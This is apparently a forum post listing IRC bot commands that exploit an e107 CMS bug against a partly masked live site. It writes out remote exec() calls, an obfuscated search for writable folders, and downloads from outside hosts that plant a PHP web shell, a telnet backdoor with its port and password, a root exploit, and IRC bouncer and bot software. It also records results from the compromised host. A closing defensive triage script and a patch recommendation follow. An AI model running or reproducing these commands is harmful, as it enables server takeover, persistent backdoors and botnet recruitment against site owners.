Some e107 bot commands I know of
!cmd www.f*asher.msk.su exec(pwd)
Result: /home/sloki/user/t85564/sites/everybodylovesirene.com/www/v2
2. List the files and folders in a directory
!cmd www.f*asher.msk.su exec('cd /var/tmp; ls')
3. Find folders under the current directory that are fully writable
!cmd www.f*asher.msk.su exec(base64_decode(\'ZmluZCAuIC10eXBlIGQgLXBlcm0gLTIgLWxz'\))
Result: /new/e107_files/cache
4. Plant a shell
!cmd www.f*asher.msk.su exec('cd /usr/home/bkdevils/domains/flasher.msk.su/public_html/magazin/templates_c;fetch http://ravenzzz.fileave.com/fxshell.txt;mv fxshell.txt shell.php;')
If it succeeds, the PHP shell is at: http://www.f*asher.msk.su//magazin/templates_c/shell.php?
5. Install telnet
!cmd www.f*asher.msk.su exec('cd /var/tmp;wget http://t.i.a.n.tripod.com/data/blind.tar.gz;tar -zxvf blind.tar.gz;rm blind.tar.gz;./blind;rm -rf blind ')
host: www.f*asher.msk.su
port: 1953
password: samboda
6. Install root
!cmd www.f*asher.msk.su exec('cd /var/tmp;wget http://maybe8.webs.com/root.pl;perl root.pl ')
7. Install psyBNC
!cmd www.f*asher.msk.su ('cd /var/tmp;wget http://maybe8.webs.com/psy.tgz;tar -zxvf psy.tgz;rm psy.tgz;cd .cpanel;./config rontok 5566;./run psybnc')
8. Install eggdrop
!cmd www.f*asher.msk.su exec('cd /var/tmp;wget http://maybe8.webs.com/e.tgz;tar -zxvf e.tgz;rm e.tgz ;cd .httpd;./crot nick ident ip channel owner;./start nick')
* If needed, also wget the terobot.conf you have already edited
9. Install a Perl bot
!cmd www.f*asher.msk.su exec('cd /var/tmp;wget www.loyalmoses.com/junk/vopcrew_multiscanner.txt;perl vopcrew_multiscanner.txt')
10. Find out the kernel type
!cmd www.f*asher.msk.su php_uname()
Result: Linux srv140 2.6.26-2-vserver-amd64 #1 SMP Thu Feb 11 02:19:12 UTC 2010 x86_64
11. Find out the disabled commands
!cmd www.f*asher.msk.su ini_get('disable_functions')
Result:
disk_total_space, diskfreespace, exec, system, popen, proc_open, proc_nice, shell_exec, passthru, dl
The bot feels as if it is integrated with a shell; an attacker can manage the shell as though logged in over telnet. You can replace index.php too, so be careful about defacing.
If you run e107, I recommend patching the bug on your site immediately. Join the e107 community to get information about e107.
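For site owners checking whether a host has already been touched, the following is an added example, not part of the original post: a Python triage script that looks for the artifacts the commands above leave behind, namely world-writable directories under the web root (what the encoded command in item 3, `find . -type d -perm -2 -ls`, enumerates), script files inside cache/template directories, and hidden directories or executables in a temp directory. The directory names come from the post; the `GENERATED` suffix list, the function names and the sample tree are assumptions constructed for illustration.

```python
import os
import stat
import tempfile

DROP_DIRS = {"cache", "templates_c"}       # writable dirs used as drop points in the post
SCRIPT_EXTS = (".php", ".phtml", ".pl", ".cgi")
GENERATED = (".tpl.php", ".cache.php")     # assumption: suffixes your CMS itself writes

def world_writable_dirs(root):
    """Directories with the other-write bit set, the set `find -type d -perm -2` lists."""
    return sorted(d for d, _, _ in os.walk(root) if os.stat(d).st_mode & stat.S_IWOTH)

def scripts_in_drop_dirs(root):
    """Script files in cache/template dirs that do not look like generated files."""
    hits = []
    for d, _, files in os.walk(root):
        if DROP_DIRS & set(os.path.relpath(d, root).split(os.sep)):
            hits += [os.path.join(d, f) for f in files
                     if f.lower().endswith(SCRIPT_EXTS)
                     and not f.lower().endswith(GENERATED)]
    return sorted(hits)

def suspicious_tmp_entries(tmpdir):
    """Hidden directories and executable files directly under a temp dir such as /var/tmp."""
    hits = []
    for e in os.scandir(tmpdir):
        if e.is_dir(follow_symlinks=False) and e.name.startswith("."):
            hits.append(("hidden-dir", e.name))
        elif e.is_file(follow_symlinks=False) and e.stat().st_mode & 0o111:
            hits.append(("executable", e.name))
    return sorted(hits)

def build_sample(base):
    """Constructed sample tree: names mirror paths in the post, every file is empty."""
    web, tmp = os.path.join(base, "www"), os.path.join(base, "var_tmp")
    for d in ("e107_files/cache", "magazin/templates_c", "e107_handlers"):
        os.makedirs(os.path.join(web, d))
    os.makedirs(os.path.join(tmp, ".httpd"))
    for f in ("magazin/templates_c/shell.php", "magazin/templates_c/index.tpl.php",
              "e107_handlers/core.php"):
        open(os.path.join(web, f), "w").close()
    open(os.path.join(tmp, "blind"), "w").close()
    os.chmod(os.path.join(tmp, "blind"), 0o700)
    os.chmod(os.path.join(web, "e107_files/cache"), 0o777)
    return web, tmp

if __name__ == "__main__":
    web, tmp = build_sample(tempfile.mkdtemp())
    print(world_writable_dirs(web), scripts_in_drop_dirs(web), suspicious_tmp_entries(tmp))
```

Point the three functions at the real web root and `/var/tmp`; every hit is a candidate for review, not a verdict. Files that match the `GENERATED` suffixes are skipped to cut noise, so check their modification times separately.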